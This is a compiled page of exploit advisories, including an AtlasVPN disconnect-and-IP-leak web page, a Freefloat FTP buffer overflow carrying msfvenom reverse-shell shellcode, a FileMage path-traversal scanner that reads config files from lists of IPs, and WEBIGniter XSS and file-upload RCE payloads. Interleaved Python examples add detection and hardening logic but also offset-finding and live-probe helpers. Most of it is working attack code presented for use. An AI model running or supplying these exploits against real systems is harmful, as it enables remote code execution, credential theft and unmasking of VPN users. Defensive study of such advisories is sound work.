<pre><code>The internet radio device auna IR-160 SE has multiple vulnerabilities. <br />It uses the firmware UIProto, different versions of which can also be <br />found in many other radios.<br /><br />1. The firmware offers a rudimentary web API that can be reached on the <br />local network on port 80. This API is completely unauthenticated, so <br />anyone on the local network can control the radio. (Already known as <br />CVE-2019-13474, but relevant for the other two findings.) [1] [2] [3]<br /><br />2. The web UI does not HTML-encode user-supplied values before rendering <br />them, resulting in an XSS vulnerability, e.g. when changing the device <br />name as follows:<br />http://192.168.178.93/set_dname?name=><script>alert(1)</script><br /><br />3. The firmware crashes when it receives a device name longer than 84 <br />characters. Some parts of the firmware recover afterwards and music <br />plays again after a few seconds, but the service on port 80 stays <br />down until the radio is reset using the switch on the back. This may <br />or may not be a memory corruption vulnerability. I don't feel like <br />analyzing this any further, but it certainly looks kinda fucked.<br />.../set_dname?name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<br /><br />For other vulnerabilities in UIProto see CVE-2019-13473 and <br />CVE-2019-13474, discovered by Benjamin K.M. Those reports also list <br />other devices that are possibly affected.<br /><br />Also, if anyone knows how to re-enable telnetd on the patched version of <br />UIProto, please let me know!<br /><br />Love,<br />naphthalin<br /><br />[1] https://github.com/kayrus/iradio<br />[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio<br />[3] https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution<br /><br /></code></pre>
<pre><code>The following is my 0day. This code, when served from any website, disconnects the AtlasVPN Linux client and leaks the user's IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users' safety seriously, because their software security decisions suck so massively that it's hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a PGP key or any sign of a bug bounty programme. Nope. No answer.<br /><br />Root Cause<br /><br />The AtlasVPN Linux client consists of two parts: a daemon (atlasvpnd) that manages the connections, and a client (atlasvpn) that the user runs to connect, disconnect and list services. The two do not talk over a Unix domain socket or any other channel protected by file permissions. Instead, the daemon exposes an HTTP API on localhost, port 8076, and that API has NO authentication at all. The port can be reached by ANY program running on the computer, including the browser. A cross-origin HTML form POST is sent by the browser without any CORS preflight (the attacker cannot read the response, but does not need to), so malicious JavaScript on ANY website can submit a request to that port and disconnect the VPN. A second request to an external IP-echo service then reveals the user's real home IP address to ANY website running the exploit code.<br /><br />Exploit Code<br /><br />The following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. 
Not intended for illegal purposes.<br /><br /><br /><br /> <html><br /> <head><br /> <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title><br /> </head><br /> <body><br /> <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=<br /> You should be running the atlasvpn linux client and be connected to a VPN.<br /> Use <b>atlasvpn connect</b> to connect to a VPN server.<br /> </code></pre><br /> <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe><br /> <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame"><br /> <button type="submit" style="display: none"></button><br /> </form><br /> <script><br /> window._currentIP = false;<br /> // Run main exploit code<br /> window.addEventListener('load', function () {<br /> addIPToLog();<br /> setTimeout(triggerFormSubmission, 1000);<br /> setTimeout(addIPToLog, 3000);<br /> });<br /> // Blind CORS request to atlasvpnd to disconnect the VPN<br /> function triggerFormSubmission() {<br /> var logDiv = document.getElementById('log');<br /> logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";<br /> document.getElementById('stopForm').submit();<br /> }<br /> // Gets IP from ipfy API (this, of course, could be your server)<br /> function addIPToLog() {<br /> var logDiv = document.getElementById('log');<br /> var xhr = new XMLHttpRequest();<br /> xhr.open('GET', 'https://api.ipify.org?format=json', true);<br /> xhr.onload = function () {<br /> var ipAddress = window._currentIP;<br /> if (xhr.status === 200) {<br /> var response = JSON.parse(xhr.responseText);<br /> ipAddress = response.ip;<br /> logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";<br /> } else {<br /> logDiv.innerHTML += '[-] Error fetching IP address.\n';<br /> }<br /> // Check if the IP changed. 
If yes: Success.<br /> if (window._currentIP && window._currentIP != ipAddress) {<br /> logDiv.innerHTML += "[+] Successfully disconnected VPN.\n"<br /> }<br /> if (window._currentIP && window._currentIP == ipAddress) {<br /> logDiv.innerHTML += "[-] Disconnect failed or you were not connected to the VPN in the first place.\n"<br /> }<br /> // Save IP for next iteration.<br /> window._currentIP = ipAddress;<br /> };<br /> xhr.send();<br /> }<br /> </script><br /> </body><br /> </html><br /> <br /><br /><br />Greets<br /><br />Fly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.<br /></code></pre>
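As an added illustration (not AtlasVPN's code and not part of the post above), the following Python models the request-admission check a loopback control API such as atlasvpnd's would need in order to refuse the hidden-form POST shown in the exploit. The hypothetical `LocalApiPolicy` uses three independent signals: a per-boot bearer token that the CLI is assumed to read from a file only the user can read, the `Origin` and `Sec-Fetch-Site` headers that browsers add to cross-site requests but a local CLI never sends, and a JSON-only content type, which an HTML form cannot produce. The same class of problem applies to the unauthenticated LAN API of the auna radio in the first advisory on this page: a browser on the same network can be made to send requests to it just as well. The request samples are constructed.

```python
import hmac
import secrets

# Content types an HTML <form> can submit cross-origin without a CORS preflight.
FORM_TYPES = ("application/x-www-form-urlencoded", "multipart/form-data", "text/plain")


class LocalApiPolicy:
    """Admission check for a loopback control API (hypothetical, for illustration).

    A request is accepted only if all of the following hold:
      1. it carries a bearer token equal to the daemon's per-boot secret,
      2. it does not look browser-originated: no Origin header, and
         Sec-Fetch-Site, if present, is "none",
      3. state-changing methods use a JSON body, which an HTML form cannot send.
    """

    def __init__(self, token=None):
        # A real daemon would write this to a mode-0600 file that the CLI reads.
        self.token = token or secrets.token_hex(32)

    def decide(self, method, headers):
        h = {k.lower(): v for k, v in headers.items()}

        scheme, _, presented = h.get("authorization", "").partition(" ")
        if scheme.lower() != "bearer" or not hmac.compare_digest(
                presented.encode(), self.token.encode()):
            return False, "missing or wrong bearer token"

        if "origin" in h:
            return False, "Origin header present: request came from a web page"
        if h.get("sec-fetch-site", "none") != "none":
            return False, "Sec-Fetch-Site=%s: cross-site fetch" % h["sec-fetch-site"]

        if method.upper() in ("POST", "PUT", "DELETE"):
            ctype = h.get("content-type", "").split(";")[0].strip().lower()
            if ctype == "" or ctype in FORM_TYPES:
                return False, "form-submittable content type %r" % ctype
        return True, "ok"


def vulnerable_decide(method, headers):
    """What atlasvpnd 1.0.3 effectively does according to the post: accept everything."""
    return True, "no checks"


# Constructed request headers: what a browser sends for the hidden-form POST in
# the exploit above, and what a CLI would send under this policy.
BROWSER_FORM_POST = {
    "Host": "127.0.0.1:8076",
    "Origin": "https://attacker.example",
    "Sec-Fetch-Site": "cross-site",
    "Content-Type": "application/x-www-form-urlencoded",
}


def cli_request(token):
    return {
        "Host": "127.0.0.1:8076",
        "Authorization": "Bearer " + token,
        "Content-Type": "application/json",
    }


if __name__ == "__main__":
    policy = LocalApiPolicy()
    for name, hdrs in [("browser form POST", BROWSER_FORM_POST),
                       ("CLI with token", cli_request(policy.token))]:
        print("%-18s vulnerable=%s hardened=%s" % (
            name, vulnerable_decide("POST", hdrs), policy.decide("POST", hdrs)))
```

Any one of the three checks alone would have stopped the form POST in the exploit; the token is the one that also covers non-browser local processes, which the `Origin` and content-type checks do not.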
<pre><code>#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow<br />#Date: 08/22/2023<br />#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)<br />#Vendor Homepage: http://www.freefoat.com<br />#Version: 1.0<br />#Tested on Windows XP SP3 <br /><br /><br />#!/usr/bin/env python3<br /><br />import socket<br /><br />#Metasploit Shellcode<br />#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' <br /><br />#nc -lvp 4444<br />#Send exploit<br /><br /><br />#offset = 247 <br />#badchars = \x00\x0d<br />#return_address = \x3b\x69\x5a\x77 (ole32.dll)<br /><br />payload = (<br />b"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"<br />b"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"<br />b"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"<br />b"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"<br />b"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"<br />b"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"<br />b"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"<br />b"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"<br />b"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"<br />b"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"<br />b"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"<br />b"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"<br />b"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"<br />b"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"<br />b"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"<br />b"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"<br />b"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"<br />b"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"<br />b"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"<br />b"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"<br />b"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"<br />b"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"<br />b"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"<br />b"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"<br />b"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"<br />b"\x19")<br /><br /># Buffer layout: 247 bytes of padding up to the saved return address,<br /># the 4-byte return address (little-endian) taken from ole32.dll,<br /># a 10-byte NOP sled, then the reverse-shell payload.<br />buffer = b'A' * 247 + b"\x3b\x69\x5a\x77" + b'\x90' * 10 + payload<br /><br />def main():<br />    ip = '192.168.146.135'<br />    port = 21<br /><br />    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />    sock.connect((ip, port))<br /><br />    sock.recv(1024)  # banner<br />    sock.send(b'USER anonymous\r\n')<br />    sock.recv(1024)<br />    sock.send(b'PASS anonymous\r\n')<br />    sock.recv(1024)<br />    # The oversized argument to PWD overflows the server's stack buffer.<br />    sock.send(b'pwd ' + buffer + b'\r\n')<br />    sock.close()<br /><br />if __name__ == '__main__':<br />    main()<br /><br /></code></pre>
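The header comments above record an offset of 247 and the bad characters \x00 and \x0d, but not how they were obtained. As an added example (not the exploit author's code), here is the usual way of deriving them in Python: a Metasploit-style cyclic pattern, a lookup that turns the value found in EIP (or the four bytes it holds) back into an offset, a bad-character test string, a comparison of what was sent against what the debugger shows in memory, and a builder for the final buffer layout used above. The "observed" memory dump in the demo is constructed.

```python
import itertools
import string


def pattern_create(length):
    """Non-repeating pattern 'Aa0Aa1Aa2...' as produced by msf's pattern_create.

    Unique for up to 26*26*10*3 = 20280 bytes, far more than the 247 needed here.
    """
    out = bytearray()
    for a, b, c in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase, string.digits):
        out += (a + b + c).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern, needle):
    """Offset of needle in the pattern, or -1 if absent.

    needle may be the 4 bytes read from a register, or the integer value the
    debugger displays (e.g. EIP=0x69413269), which is decoded little-endian
    because that is how x86 stored it on the stack.
    """
    if isinstance(needle, int):
        needle = needle.to_bytes(4, "little")
    return pattern.find(needle)


def badchar_string(exclude=(0x00,)):
    """All byte values except those already known to be bad; 0x00 by default."""
    excluded = set(exclude)
    return bytes(b for b in range(256) if b not in excluded)


def first_divergence(sent, observed):
    """Index of the first byte where the memory dump differs from what was sent.

    sent[index] is the next bad character: add it to `exclude` and repeat
    until the whole string arrives intact. Returns None when identical.
    """
    for i, (s, o) in enumerate(zip(sent, observed)):
        if s != o:
            return i
    if len(observed) < len(sent):
        return len(observed)
    return None


def build_buffer(offset, ret_addr, shellcode, nop_len=10):
    """Padding + little-endian return address + NOP sled + shellcode,
    the layout of the `buffer` variable in the exploit above."""
    return (b"A" * offset + ret_addr.to_bytes(4, "little")
            + b"\x90" * nop_len + shellcode)


if __name__ == "__main__":
    pat = pattern_create(300)
    print("EIP 0x69413269 -> offset", pattern_offset(pat, 0x69413269))
    # Constructed dump: the FTP server treated 0x0d (CR) as end of line and
    # dropped it and everything after it.
    test = badchar_string()
    observed = test[:test.index(0x0d)]
    print("next bad char: 0x%02x" % test[first_divergence(test, observed)])
    print(build_buffer(247, 0x775a693b, b"\xcc")[247:251])
```

Note that the FTP command parser is why 0x0d is bad: it terminates the line before the rest of the argument is copied, which is exactly what `first_divergence` reports on the constructed dump.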
<pre><code>#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path<br />#Date: 8/22/2023<br />#Exploit Author: Anish Feroz (ZEROXINN)<br />#Vendor Homepage: https://www.kingoapp.com/<br />#Software Link: https://www.kingoapp.com/android-root/download.htm<br />#Version: 1.5.8.3353<br />#Tested on: Windows 10 Pro<br /><br />-------------Discovering Unquoted Path--------------<br /><br />C:\Users\Anish>sc qc KingoSoftService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: KingoSoftService<br />        TYPE               : 110  WIN32_OWN_PROCESS (interactive)<br />        START_TYPE         : 2   AUTO_START<br />        ERROR_CONTROL      : 1   NORMAL<br />        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe<br />        LOAD_ORDER_GROUP   :<br />        TAG                : 0<br />        DISPLAY_NAME       : KingoSoftService<br />        DEPENDENCIES       :<br />        SERVICE_START_NAME : LocalSystem<br /><br />The BINARY_PATH_NAME is not quoted and contains a space ("Kingo Root"), the service starts automatically, and it runs as LocalSystem.<br /><br />C:\Users\Anish>systeminfo<br /><br />Host Name:                 DESKTOP-UT7E7CF<br />OS Name:                   Microsoft Windows 10 Pro<br />OS Version:                10.0.19045 N/A Build 19045<br /><br /></code></pre>
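As an added example (not part of the advisory above and not Kingo's code), the following Python parses the `sc qc` output shown above, decides whether the BINARY_PATH_NAME is an exploitable unquoted service path, and lists the file names CreateProcess would try before the real executable. The sample text is a constructed copy of that output. Two conditions the script cannot check remain for the host: a low-privileged user must be able to write to one of the candidate directories (verify with `icacls` on `C:\Users\Usman\AppData\Local\Kingosoft`), and the service must start again, which for an AUTO_START service happens at the next reboot.

```python
import re

# Constructed copy of the `sc qc KingoSoftService` output from the advisory.
SC_QC_OUTPUT = r"""
SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KingoSoftService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

_FIELD = re.compile(r"\s*([A-Z_]+)\s*:\s*(.*)$")
_EXE = re.compile(r"(.*?\.exe)", re.IGNORECASE)


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        m = _FIELD.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def executable_part(binary_path):
    """The path up to and including '.exe'; arguments after it do not take
    part in the CreateProcess lookup."""
    m = _EXE.match(binary_path.strip())
    return m.group(1) if m else binary_path.strip()


def is_unquoted_with_spaces(binary_path):
    """True when the path is not wrapped in quotes and the executable part
    contains a space."""
    if binary_path.strip().startswith('"'):
        return False
    return " " in executable_part(binary_path)


def hijack_candidates(binary_path):
    """Files CreateProcess tries, in order, before the intended executable.

    For an unquoted 'C:\\dir one\\dir two\\svc.exe' Windows tries
    'C:\\dir.exe', then 'C:\\dir one\\dir.exe', then the real file.
    """
    exe = executable_part(binary_path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def assess(text):
    """Summarise exploitability of one service from its `sc qc` output."""
    f = parse_sc_qc(text)
    path = f.get("BINARY_PATH_NAME", "")
    unquoted = is_unquoted_with_spaces(path)
    return {
        "service": f.get("SERVICE_NAME"),
        "runs_as": f.get("SERVICE_START_NAME"),
        "auto_start": f.get("START_TYPE", "").endswith("AUTO_START"),
        "unquoted": unquoted,
        "candidates": hijack_candidates(path) if unquoted else [],
    }


if __name__ == "__main__":
    for k, v in assess(SC_QC_OUTPUT).items():
        print("%-10s %s" % (k, v))
```

For the path above there is exactly one candidate, `C:\Users\Usman\AppData\Local\Kingosoft\Kingo.exe`; a planted executable there would be started as LocalSystem by the Service Control Manager.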
<pre><code># Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion<br /># Date: 8/22/2023<br /># Exploit Author: Bryce "Raindayzz" Harty <br /># Vendor Homepage: https://www.filemage.io/<br /># Version: Azure Versions < 1.10.9<br /># Tested on: All Azure deployments < 1.10.9 <br /># CVE : CVE-2023-39026<br /><br /># Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html<br /># Patch from vendor - https://www.filemage.io/docs/updates.html<br /><br />import warnings<br /><br />import requests<br /><br />warnings.filterwarnings("ignore")  # the gateway usually serves a self-signed certificate<br /><br /># Path traversal through the /mgmnt/ handler: backslash-encoded "..%5c"<br /># segments walk up to the drive root and read the gateway's config.yaml<br /># from ProgramData on the Windows host.<br />TRAVERSAL_PATH = "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"<br /><br /><br />def fetch(url):<br />    return requests.get(url, verify=False, timeout=0.5)<br /><br /><br />def main():<br />    vulnerable = []<br />    file_path = input("Enter the path to the file containing the IP addresses: ")<br />    with open(file_path, 'r') as file:<br />        ip_list = file.read().splitlines()<br />    # Marker the author looks for in a successfully returned config.yaml.<br />    search_string = "tls"<br />    for ip in ip_list:<br />        url = f"https://{ip}{TRAVERSAL_PATH}"<br />        try:<br />            response = fetch(url)<br />            if search_string in response.text:<br />                print("Vulnerable IP: " + ip)<br />                print(response.text)<br />                vulnerable.append(ip)<br />        except requests.exceptions.RequestException as e:<br />            print(f"Error occurred for {ip}: {e}")<br /><br />    for ip in vulnerable:<br />        print(ip)<br /><br /><br />if __name__ == '__main__':<br />    main()<br /><br /></code></pre>
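The script above sends backslash-encoded `..%5c` segments, which is exactly the form a filter that only looks for a literal `../` misses. As an added example (not the exploit author's code and not FileMage's), here is the detection and hardening logic in Python: a bounded percent-decoder that collapses single and double encoding, a traversal check that treats both separators as path separators, a scan over constructed access-log lines (the first carries the exact payload used above), and a resolver that refuses any request whose decoded path still contains a `..` segment. The log lines and the document root are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# A '..' segment delimited by / or \ (or the string boundary) once decoded.
_TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Common log format: ... "GET /path HTTP/1.1" 200 ...
_LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def naive_check(path):
    """The check that is bypassed by '..%5c': it only knows the literal '../'."""
    return "../" not in path


def decode_path(path, rounds=3):
    """Percent-decode until the path stops changing (bounded), so that %5c,
    %255c and %5C all end up as a backslash."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    """True if the fully decoded path contains a '..' segment."""
    return _TRAVERSAL.search(decode_path(path)) is not None


def scan_log(lines):
    """(path, status) for every access-log line whose request path traverses."""
    hits = []
    for line in lines:
        m = _LOG_LINE.search(line)
        if m and is_traversal(m.group("path")):
            hits.append((m.group("path"), int(m.group("status"))))
    return hits


def safe_resolve(root, requested):
    """Hardened lookup: decode, treat backslash as a separator, drop empty and
    '.' segments, refuse '..' outright, then join under root. None = rejected."""
    decoded = decode_path(requested).replace("\\", "/")
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if ".." in parts:
        return None
    return posixpath.join(root, *parts)


# Constructed sample lines; the first is the request the script above sends.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Aug/2023:10:00:01 +0000] "GET /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml HTTP/1.1" 200 1834',
    '203.0.113.7 - - [20/Aug/2023:10:00:02 +0000] "GET /mgmnt/..%255c..%255cwindows%255cwin.ini HTTP/1.1" 200 92',
    '198.51.100.2 - - [20/Aug/2023:10:00:03 +0000] "GET /mgmnt/static/app.js HTTP/1.1" 200 5120',
    '198.51.100.2 - - [20/Aug/2023:10:00:04 +0000] "GET /files/report..2023.pdf HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for path, status in scan_log(SAMPLE_LOG):
        print("traversal (HTTP %d): %s" % (status, path[:60]))
    print(safe_resolve("/srv/www", "/mgmnt/..%5c..%5cprogramdata%5cx"))
    print(safe_resolve("/srv/www", "/mgmnt/static/app.js"))
```

A 200 on a traversal request is the signal to escalate: the server returned content for a path it should have rejected, so the file in question should be assumed read.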
<pre><code>## Title: WEBIGniter-28.7.23 File Upload - RCE<br />## Author: nu11secur1ty<br />## Date: 09/04/2023<br />## Vendor: https://webigniter.net/<br />## Software: https://webigniter.net/demo<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br /><br />## Description:<br />The media function suffers from an unrestricted file upload vulnerability.<br />Any account created on the system beforehand can upload PHP files, and<br />the server executes them when they are requested, giving the attacker<br />remote code execution on the server hosting the application.<br /><br />## Status: HIGH-CRITICAL Vulnerability<br /><br />[+]Simple Exploit:<br />```PHP<br /><?php<br /> phpinfo();<br />?><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html)<br /><br />## Time spent:<br />00:15:00<br /><br /><br /></code></pre>
<pre><code>## Title: WEBIGniter-28.7.23-XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/04/2023<br />## Vendor: https://webigniter.net/<br />## Software: https://webigniter.net/demo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting<br /><br /><br />## Description:<br />The value of the redirect request parameter is copied into the value<br />of an HTML tag attribute which is enclosed in double quotation marks.<br />The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the<br />redirect parameter and was echoed unmodified in the application's<br />response: the double quote closes the attribute, the > closes the tag,<br />and the browser renders the injected script element.<br />Using this JavaScript injection, an attacker can trick a lot of users<br />into visiting his crafted URL. The injected content is reflected on<br />the login form, before they log in, and could for example warn them<br />that there is a problem with the login, which is very nasty and<br />DANGEROUS!<br /><br />## Status: HIGH Vulnerability<br /><br />[+]Payload:<br />```GET<br />GET /cms/login?redirect=cmsycsz3%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebn76w HTTP/1.1<br />Host: demo.webigniter.net<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-xss-reflected.html)<br /><br />## Time spent:<br />01:35:00<br /><br /><br /></code></pre>
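As an added example (not code from the WEBIGniter advisory, nor from the auna radio advisory at the top of this page), the following Python shows the two reflection contexts that appear on this page side by side with their encoded forms: the attribute context of the `redirect` parameter, where a double quote is enough to break out, and the text context of the radio's device name, where `<` and `>` are. `html.escape` handles both. The `probe` helper sends the advisory's canary through any fetch callable and reports whether it comes back unencoded; the two fake login pages are constructed stand-ins so the check runs offline against a vulnerable and a fixed server.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

LOGIN_TEMPLATE = ('<form method="post" action="/cms/login">'
                  '<input type="hidden" name="redirect" value="%s">'
                  '</form>')


def render_login_vulnerable(redirect):
    """Attribute context, no encoding: the behaviour the advisory describes."""
    return LOGIN_TEMPLATE % redirect


def render_login_fixed(redirect):
    """html.escape(quote=True) turns & < > " ' into entities, so the value
    can neither close the attribute nor start a tag."""
    return LOGIN_TEMPLATE % html.escape(redirect, quote=True)


def render_name_vulnerable(name):
    """Text-node context, as with the radio's device name."""
    return '<span class="device-name">%s</span>' % name


def render_name_fixed(name):
    return '<span class="device-name">%s</span>' % html.escape(name)


# Canary from the advisory: a quote to leave the attribute, a > to close the
# tag, then a script element; the random affixes make it easy to locate.
CANARY = 'ycsz3"><script>alert(1)</script>bn76w'


def reflected_unencoded(body, canary=CANARY):
    """True when the canary appears byte-for-byte, i.e. it landed as markup."""
    return canary in body


def probe(fetch, url_template, canary=CANARY):
    """Inject the canary through `fetch(url)` (any callable returning the
    response body as str) and report whether it is reflected unencoded."""
    body = fetch(url_template.format(quote(canary, safe="")))
    return reflected_unencoded(body, canary)


# Constructed offline stand-ins for the login page, vulnerable and fixed.
def _redirect_param(url):
    return parse_qs(urlsplit(url).query).get("redirect", [""])[0]


def fake_vulnerable_login(url):
    return render_login_vulnerable(_redirect_param(url))


def fake_fixed_login(url):
    return render_login_fixed(_redirect_param(url))


LOGIN_URL = "https://demo.webigniter.net/cms/login?redirect=cms{}"

if __name__ == "__main__":
    print("vulnerable reflects unencoded:", probe(fake_vulnerable_login, LOGIN_URL))
    print("fixed reflects unencoded:     ", probe(fake_fixed_login, LOGIN_URL))
    print(render_login_fixed(CANARY))
    print(render_name_fixed("><script>alert(1)</script>"))
```

To run the probe against a live target, pass a fetch callable such as `lambda u: requests.get(u).text`; the canary is deliberately the one from the advisory so a hit in the response is unambiguous.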
<pre><code># Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information<br /># Date : 25-08-2023<br /># Exploit Author : tahaafarooq<br /># Vendor Homepage : https://dlink.com/<br /># Version : FRU2.2.15.8<br /># Tested on: DLINK DPH-400SE (VoIP Phone)<br /><br />Description:<br /><br />With the default credentials for the guest user ("guest:guest") it is possible to log in to the web portal. From there the guest user can open the Maintenance tab, go to Access and modify any user account, including the administrator's, and the web UI reveals the stored passwords of all users in plaintext. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200<br /><br />POC :<br /><br />1. Log in with the default guest credentials "guest:guest".<br />2. Open the Maintenance tab.<br />3. Under the Maintenance tab, open the "Access" feature.<br />4. Under "Account Option" choose a user to modify, e.g. "Admin", and click Modify.<br />5. Right-click the password field and click reveal; the password is shown in plaintext.<br /><br /></code></pre>
